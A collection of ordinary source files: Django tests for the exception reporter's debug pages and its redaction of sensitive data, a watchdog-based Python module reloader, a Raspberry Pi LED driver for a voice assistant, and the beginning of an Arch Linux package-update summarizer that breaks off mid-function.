html = ExceptionReporter(None, exc_type, exc_value, tb).get_traceback_html()
self.assertIn('<td class="code"><pre>'<p>Local variable</p>'</pre></td>', html)
def test_unprintable_values_handling(self):
"Unprintable values should not make the output generation choke."
try:
class OomOutput:
def __repr__(self):
raise MemoryError('OOM')
oomvalue = OomOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<td class="code"><pre>Error in formatting', html)
def test_too_large_values_handling(self):
"Large values should not create a large HTML."
large = 256 * 1024
repr_of_str_adds = len(repr(''))
try:
class LargeOutput:
def __repr__(self):
return repr('A' * large)
largevalue = LargeOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertEqual(len(html) // 1024 // 128, 0) # still fit in 128Kb
self.assertIn('<trimmed %d bytes string>' % (large + repr_of_str_adds,), html)
def test_encoding_error(self):
"""
A UnicodeError displays a portion of the problematic string. HTML in
safe strings is escaped.
"""
try:
mark_safe('abcdefghijkl<p>mnὀp</p>qrstuwxyz').encode('ascii')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h2>Unicode error hint</h2>', html)
self.assertIn('The string that could not be encoded/decoded was: ', html)
self.assertIn('<strong><p>mnὀp</p></strong>', html)
def test_unfrozen_importlib(self):
"""
importlib is not a frozen app, but its loader thinks it's frozen which
results in an ImportError. Refs #21443.
"""
try:
request = self.rf.get('/test_view/')
importlib.import_module('abc.def.invalid.name')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ModuleNotFoundError at /test_view/</h1>', html)
def test_ignore_traceback_evaluation_exceptions(self):
"""
Don't trip over exceptions generated by crafted objects when
evaluating them while cleansing (#24455).
"""
class BrokenEvaluation(Exception):
pass
def broken_setup():
raise BrokenEvaluation
request = self.rf.get('/test_view/')
broken_lazy = SimpleLazyObject(broken_setup)
try:
bool(broken_lazy)
except BrokenEvaluation:
exc_type, exc_value, tb = sys.exc_info()
self.assertIn(
"BrokenEvaluation",
ExceptionReporter(request, exc_type, exc_value, tb).get_traceback_html(),
"Evaluation exception reason not mentioned in traceback"
)
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn("http://evil.com/", html)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
value = '<td>items</td><td class="code"><pre>'Oops'</pre></td>'
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(
'<td>items</td><td class="code"><pre><InMemoryUploadedFile: '
'items (application/octet-stream)></pre></td>',
html
)
# COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<td>items</td><td class="code"><pre>'Oops'</pre></td>', html)
def test_exception_fetching_user(self):
"""
The error page can be rendered if the current user can't be retrieved
(such as when the database is unavailable).
"""
class ExceptionUser:
def __str__(self):
raise Exception()
request = self.rf.get('/test_view/')
request.user = ExceptionUser()
try:
raise ValueError('Oops')
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Oops</pre>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>[unable to retrieve the current user]</p>', html)
text = reporter.get_traceback_text()
self.assertIn('USER: [unable to retrieve the current user]', text)
def test_template_encoding(self):
"""
The templates are loaded directly, not via a template loader, and
should be opened as utf-8 charset as is the default specified on
template engines.
"""
reporter = ExceptionReporter(None, None, None, None)
with mock.patch.object(DebugPath, 'open') as m:
reporter.get_traceback_html()
m.assert_called_once_with(encoding='utf-8')
m.reset_mock()
reporter.get_traceback_text()
m.assert_called_once_with(encoding='utf-8')
class PlainTextReportTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError at /test_view/', text)
self.assertIn("Can't find my keys", text)
self.assertIn('Request Method:', text)
self.assertIn('Request URL:', text)
self.assertIn('USER: jacob', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request information:', text)
self.assertNotIn('Request data not supplied', text)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError', text)
self.assertIn("Can't find my keys", text)
self.assertNotIn('Request Method:', text)
self.assertNotIn('Request URL:', text)
self.assertNotIn('USER:', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request data not supplied', text)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
reporter.get_traceback_text()
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(DEBUG=True)
def test_template_exception(self):
request = self.rf.get('/test_view/')
try:
render(request, 'debug/template_error.html')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
templ_path = Path(Path(__file__).parent.parent, 'templates', 'debug', 'template_error.html')
self.assertIn(
'Template error:\n'
'In template %(path)s, error at line 2\n'
' \'cycle\' tag requires at least two arguments\n'
' 1 : Template with error:\n'
' 2 : {%% cycle %%} \n'
' 3 : ' % {'path': templ_path},
text
)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn('items = <InMemoryUploadedFile:', text)
# COOKIES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("http://evil.com/", text)
class ExceptionReportTestMixin:
# Mixin used in the ExceptionReporterFilterTests and
# AjaxResponseExceptionReporterFilter tests below
breakfast_data = {
'sausage-key': 'sausage-value',
'baked-beans-key': 'baked-beans-value',
'hash-brown-key': 'hash-brown-value',
'bacon-key': 'bacon-value',
}
def verify_unsafe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that potentially sensitive info are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# All variables are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertContains(response, k, status_code=500)
self.assertContains(response, v, status_code=500)
def verify_safe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that certain sensitive info are not displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Non-sensitive variable's name and value are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
# Sensitive variable's name is shown but not its value.
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# Non-sensitive POST parameters' values are shown.
self.assertContains(response, 'baked-beans-value', status_code=500)
self.assertContains(response, 'hash-brown-value', status_code=500)
# Sensitive POST parameters' values are not shown.
self.assertNotContains(response, 'sausage-value', status_code=500)
self.assertNotContains(response, 'bacon-value', status_code=500)
def verify_paranoid_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that no variables or POST parameters are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Show variable names but not their values.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertNotContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# No POST parameters' values are shown.
self.assertNotContains(response, v, status_code=500)
def verify_unsafe_email(self, view, check_for_POST_params=True):
"""
Asserts that potentially sensitive info are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertIn(k, body_plain)
self.assertIn(v, body_plain)
self.assertIn(k, body_html)
self.assertIn(v, body_html)
def verify_safe_email(self, view, check_for_POST_params=True):
"""
Asserts that certain sensitive info are not displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertNotIn('worcestershire', body_html)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertIn(k, body_plain)
# Non-sensitive POST parameters' values are shown.
self.assertIn('baked-beans-value', body_plain)
self.assertIn('hash-brown-value', body_plain)
self.assertIn('baked-beans-value', body_html)
self.assertIn('hash-brown-value', body_html)
# Sensitive POST parameters' values are not shown.
self.assertNotIn('sausage-value', body_plain)
self.assertNotIn('bacon-value', body_plain)
self.assertNotIn('sausage-value', body_html)
self.assertNotIn('bacon-value', body_html)
def verify_paranoid_email(self, view):
"""
Asserts that no variables or POST parameters are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body = str(email.body)
self.assertNotIn('cooked_eggs', body)
self.assertNotIn('scrambled', body)
self.assertNotIn('sauce', body)
self.assertNotIn('worcestershire', body)
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body)
# No POST parameters' values are shown.
self.assertNotIn(v, body)
@override_settings(ROOT_URLCONF='view_tests.urls')
class ExceptionReporterFilterTests(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports (#14614).
"""
rf = RequestFactory()
def test_non_sensitive_request(self):
"""
Everything (request info and frame variables) can bee seen
in the default error reports for non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
def test_sensitive_request(self):
"""
Sensitive POST parameters and frame variables cannot be
seen in the default error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view)
self.verify_unsafe_email(sensitive_view)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view)
self.verify_safe_email(sensitive_view)
def test_paranoid_request(self):
"""
No POST parameters and frame variables can be seen in the
default error reports for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view)
self.verify_unsafe_email(paranoid_view)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view)
self.verify_paranoid_email(paranoid_view)
def test_multivalue_dict_key_error(self):
"""
#21098 -- Sensitive POST parameters cannot be seen in the
error reports for if request.POST['nonexistent_key'] throws an error.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(multivalue_dict_key_error)
self.verify_unsafe_email(multivalue_dict_key_error)
with self.settings(DEBUG=False):
self.verify_safe_response(multivalue_dict_key_error)
self.verify_safe_email(multivalue_dict_key_error)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
def test_sensitive_method(self):
"""
The sensitive_variables decorator works with object methods.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_unsafe_email(sensitive_method_view, check_for_POST_params=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_safe_email(sensitive_method_view, check_for_POST_params=False)
def test_sensitive_function_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as arguments to the decorated
function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_args_function_caller)
self.verify_unsafe_email(sensitive_args_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_args_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_args_function_caller, check_for_POST_params=False)
def test_sensitive_function_keyword_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as keyword arguments to the
decorated function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_kwargs_function_caller)
self.verify_unsafe_email(sensitive_kwargs_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_kwargs_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_kwargs_function_caller, check_for_POST_params=False)
def test_callable_settings(self):
"""
Callable settings should not be evaluated in the debug page (#21345).
"""
def callable_setting():
return "This should not be displayed"
with self.settings(DEBUG=True, FOOBAR=callable_setting):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_callable_settings_forbidding_to_set_attributes(self):
"""
Callable settings which forbid to set attributes should not break
the debug page (#23070).
"""
class CallableSettingWithSlots:
__slots__ = []
def __call__(self):
return "This should not be displayed"
with self.settings(DEBUG=True, WITH_SLOTS=CallableSettingWithSlots()):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_dict_setting_with_non_str_key(self):
"""
A dict setting containing a non-string key should not break the
debug page (#12744).
"""
with self.settings(DEBUG=True, FOOBAR={42: None}):
response = self.client.get('/raises500/')
self.assertContains(response, 'FOOBAR', status_code=500)
def test_sensitive_settings(self):
"""
The debug page should not show some sensitive settings
(password, secret key, ...).
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
with self.settings(DEBUG=True, **{setting: "should not be displayed"}):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
def test_settings_with_sensitive_keys(self):
"""
The debug page should filter out some sensitive information found in
dict settings.
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
FOOBAR = {
setting: "should not be displayed",
'recursive': {setting: "should not be displayed"},
}
with self.settings(DEBUG=True, FOOBAR=FOOBAR):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
class AjaxResponseExceptionReporterFilter(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports.
Here we specifically test the plain text 500 debug-only error page served
when it has been detected the request was sent by JS code. We don't check
for (non)existence of frames vars in the traceback information section of
the response content because we don't include them in these error pages.
Refs #14614.
"""
rf = RequestFactory(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
def test_non_sensitive_request(self):
"""
Request info can bee seen in the default error reports for
non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
def test_sensitive_request(self):
"""
Sensitive POST parameters cannot be seen in the default
error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view, check_for_vars=False)
def test_paranoid_request(self):
"""
No POST parameters can be seen in the default error reports
for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view, check_for_vars=False)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
def test_ajax_response_encoding(self):
response = self.client.get('/raises500/', HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(response['Content-Type'], 'text/plain; charset=utf-8')
class HelperFunctionTests(SimpleTestCase):
def test_cleanse_setting_basic(self):
self.assertEqual(cleanse_setting('TEST', 'TEST'), 'TEST')
self.assertEqual(cleanse_setting('PASSWORD', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_ignore_case(self):
self.assertEqual(cleanse_setting('password', 'super_secret'), CLEANSED_SUBSTITUTE)
def test_cleanse_setting_recurses_in_dictionary(self):
initial = {'login': 'cooper', 'password': 'secret'}
expected = {'login': 'cooper', 'password': CLEANSED_SUBSTITUTE}
self.assertEqual(cleanse_setting('SETTING_NAME', initial), expected)
|
cmdline.py
|
import os
import sys
import time
import imp
import runpy
import traceback
import argparse
import logging
from multiprocessing import Process
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
def run_module(module, function=None):
if function is not None: # run it as a module
module = os.sep.join(module.split('.'))
pwd = os.getcwd()
module_path = os.path.join(pwd, module)
if os.path.isdir(module_path):
module_path = os.path.join(module_path, '__init__.py')
else:
module_path = "{}.py".format(module_path)
module = imp.load_source('module', module_path)
if hasattr(module, function):
getattr(module, function)()
else:
try:
# Change the sys.path
# https://docs.python.org/3/using/cmdline.html#cmdoption-m
sys.path.insert(0, '.')
runpy.run_module(module, run_name="__main__", alter_sys=True)
# Reference
# https://docs.python.org/2/library/runpy.html
except Exception, e:
exec_info = sys.exc_info()
traceback.print_exception(*exec_info)
class ChangeAndRunEventHandler(PatternMatchingEventHandler):
"""docstring for ChangeAndRunEventHandler"""
def __init__(self, module, function=None, patterns=None, ignore_patterns=None,
ignore_directories=False, case_sensitive=False):
super(ChangeAndRunEventHandler, self).__init__(patterns, ignore_patterns,
ignore_directories, case_sensitive)
self.module = module
self.function = function
self.proc = None
self._start_process()
def _start_process(self):
# if previous process is still alive, kill it
if hasattr(self.proc, 'is_alive') and self.proc.is_alive():
sys.stdout.write('terminating')
while self.proc.is_alive():
sys.stdout.write('.')
self.proc.terminate()
time.sleep(0.5)
sys.stdout.write('\n\n\n')
os.system('clear')
# create new process after ensuring that the process has been killed
self.proc = Process(target=run_module, args=(self.module, self.function, ))
self.proc.start()
# https://docs.python.org/3/library/multiprocessing.html
def on_any_event(self, event):
pass
def on_moved(self, event):
pass
def on_created(self, event):
pass
def on_deleted(self, event):
pass
def on_modified(self, event):
self._start_process()
def monitor_module(module, function=None):
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
path = os.getcwd()
event_handler = ChangeAndRunEventHandler(module, function=function, patterns=['*.py'])
observer = Observer()
observer.schedule(event_handler, path, recursive=True)
observer.start()
try:
while True:
time.sleep(1)
# observer.join()
except KeyboardInterrupt:
observer.stop()
observer.join()
def gasd(argv=sys.argv[1:]):
parser = argparse.ArgumentParser(prog='gasd', usage='%(prog)s <module>',
description=u'Central %(prog)s station debugger')
parser.add_argument(u'module', nargs=1, help=u'Debug in module mode')
opts = parser.parse_args(argv)
monitor_module(opts.module[0])
def gas_run(argv=sys.argv[1:]):
pass
|
lights.py
|
import itertools
import json
import threading
import time
import RPi.GPIO as GPIO
def on_message(ws, message):
mes = json.loads(message)
print(mes)
if mes['type'] == 'recognizer_loop:record_begin':
my_led.set_state(LED.ON)
if mes['type'] == 'recognizer_loop:audio_output_start':
my_led.set_state(LED.BEACON)
if mes['type'] == 'recognizer_loop:record_end':
my_led.set_state(LED.OFF)
if mes['type'] == 'recognizer_loop:audio_output_end':
my_led.set_state(LED.OFF)
def on_error(ws, error):
print(error)
def on_close(ws):
print("### closed ###")
class LED:
"""Starts a background thread to show patterns with the LED.
Simple usage:
my_led = LED(channel = 25)
my_led.start()
my_led.set_state(LED.BEACON)
my_led.stop()
"""
OFF = 0
ON = 1
BLINK = 2
BLINK_3 = 3
BEACON = 4
BEACON_DARK = 5
DECAY = 6
PULSE_SLOW = 7
PULSE_QUICK = 8
def __init__(self, channel):
self.animator = threading.Thread(target=self._animate)
self.channel = channel
self.iterator = None
self.running = False
self.state = None
self.sleep = 0
GPIO.setmode(GPIO.BCM)
GPIO.setup(channel, GPIO.OUT)
self.pwm = GPIO.PWM(channel, 100)
self.lock = threading.Lock()
def __del__(self):
self.stop()
GPIO.cleanup(self.channel)
def start(self):
"""Start the LED driver."""
with self.lock: # pylint: disable=E1129
if not self.running:
self.running = True
self.pwm.start(0) # off by default
self.animator.start()
def stop(self):
"""Stop the LED driver and sets the LED to off."""
with self.lock: # pylint: disable=E1129
if self.running:
self.running = False
self.animator.join()
self.pwm.stop()
def set_state(self, state):
"""Set the LED driver's new state.
Note the LED driver must be started for this to have any effect.
"""
with self.lock: # pylint: disable=E1129
self.state = state
def _animate(self):
while True:
state = None
running = False
with self.lock: # pylint: disable=E1129
state = self.state
self.state = None
running = self.running
if not running:
return
if state is not None:
if not self._parse_state(state):
raise ValueError('unsupported state: %d' % state)
if self.iterator:
self.pwm.ChangeDutyCycle(next(self.iterator))
time.sleep(self.sleep)
else:
# We can also wait for a state change here with a Condition.
time.sleep(1)
def _parse_state(self, state):
self.iterator = None
self.sleep = 0.0
handled = False
if state == self.OFF:
self.pwm.ChangeDutyCycle(0)
handled = True
elif state == self.ON:
self.pwm.ChangeDutyCycle(100)
handled = True
elif state == self.BLINK:
self.iterator = itertools.cycle([0, 100])
self.sleep = 0.5
handled = True
elif state == self.BLINK_3:
self.iterator = itertools.cycle([0, 100] * 3 + [0, 0])
self.sleep = 0.25
handled = True
elif state == self.BEACON:
self.iterator = itertools.cycle(
itertools.chain([30] * 100, [100] * 8, range(100, 30, -5)))
self.sleep = 0.05
handled = True
elif state == self.BEACON_DARK:
self.iterator = itertools.cycle(
itertools.chain([0] * 100, range(0, 30, 3), range(30, 0, -3)))
self.sleep = 0.05
handled = True
elif state == self.DECAY:
self.iterator = itertools.cycle(range(100, 0, -2))
self.sleep = 0.05
handled = True
elif state == self.PULSE_SLOW:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 2), range(100, 0, -2)))
self.sleep = 0.1
handled = True
elif state == self.PULSE_QUICK:
self.iterator = itertools.cycle(
itertools.chain(range(0, 100, 5), range(100, 0, -5)))
self.sleep = 0.05
handled = True
return handled
my_led = LED(channel=25)
my_led.start()
my_led.set_state(LED.PULSE_QUICK)
|
updates.py
|
import logging
import time
import traceback
from threading import Thread
from typing import Dict, Set, List, Tuple, Iterable, Optional
from packaging.version import parse as parse_version
from bauh.api.abstract.controller import UpgradeRequirements, UpgradeRequirement
from bauh.api.abstract.handler import ProcessWatcher
from bauh.gems.arch import pacman, sorting
from bauh.gems.arch.aur import AURClient
from bauh.gems.arch.dependencies import DependenciesAnalyser
from bauh.gems.arch.exceptions import PackageNotFoundException
from bauh.gems.arch.model import ArchPackage
from bauh.gems.arch.pacman import RE_DEP_OPERATORS
from bauh.view.util.translation import I18n
class UpdateRequirementsContext:
def __init__(self, to_update: Dict[str, ArchPackage], repo_to_update: Dict[str, ArchPackage],
aur_to_update: Dict[str, ArchPackage], repo_to_install: Dict[str, ArchPackage],
aur_to_install: Dict[str, ArchPackage], to_install: Dict[str, ArchPackage],
pkgs_data: Dict[str, dict], cannot_upgrade: Dict[str, UpgradeRequirement],
to_remove: Dict[str, UpgradeRequirement], installed_names: Set[str], provided_map: Dict[str, Set[str]],
aur_index: Set[str], arch_config: dict, remote_provided_map: Dict[str, Set[str]], remote_repo_map: Dict[str, str],
root_password: str, aur_supported: bool):
self.to_update = to_update
self.repo_to_update = repo_to_update
self.aur_to_update = aur_to_update
self.repo_to_install = repo_to_install
self.aur_to_install = aur_to_install
self.pkgs_data = pkgs_data
self.cannot_upgrade = cannot_upgrade
self.root_password = root_password
self.installed_names = installed_names
self.provided_map = provided_map
self.to_remove = to_remove
self.to_install = to_install
self.aur_index = aur_index
self.arch_config = arch_config
self.remote_provided_map = remote_provided_map
self.remote_repo_map = remote_repo_map
self.aur_supported = aur_supported
class UpdatesSummarizer:
def __init__(self, aur_client: AURClient, i18n: I18n, logger: logging.Logger, deps_analyser: DependenciesAnalyser, aur_supported: bool, watcher: ProcessWatcher):
self.aur_client = aur_client
self.i18n = i18n
self.logger = logger
self.watcher = watcher
self.deps_analyser = deps_analyser
self.aur_supported = aur_supported
def _fill_aur_pkg_update_data(self, pkg: ArchPackage, output: dict):
output[pkg.name] = self.aur_client.map_update_data(pkg.get_base_name(), pkg.latest_version)
def _handle_conflict_both_to_install(self, pkg1: str, pkg2: str, context: UpdateRequirementsContext):
for src_pkg in {p for p, data in context.pkgs_data.items() if
data['d'] and pkg1 in data['d'] or pkg2 in data['d']}:
if src_pkg not in context.cannot_upgrade:
reason = self.i18n['arch.update_summary.to_install.dep_conflict'].format("'{}'".format(pkg1),
"'{}'".format(pkg2))
context.cannot_upgrade[src_pkg] = UpgradeRequirement(context.to_update[src_pkg], reason)
del context.to_update[src_pkg]
if src_pkg in context.repo_to_update:
del context.repo_to_update[src_pkg]
else:
del context.aur_to_update[src_pkg]
del context.pkgs_data[src_pkg]
for p in (pkg1, pkg2):
if p in context.to_install:
del context.to_install[p]
if p in context.repo_to_install:
del context.repo_to_install[p]
else:
del context.aur_to_install[p]
def _handle_conflict_to_update_and_to_install(self, pkg1: str, pkg2: str, pkg1_to_install: bool, context: UpdateRequirementsContext):
to_install, to_update = (pkg1, pkg2) if pkg1_to_install else (pkg2, pkg1)
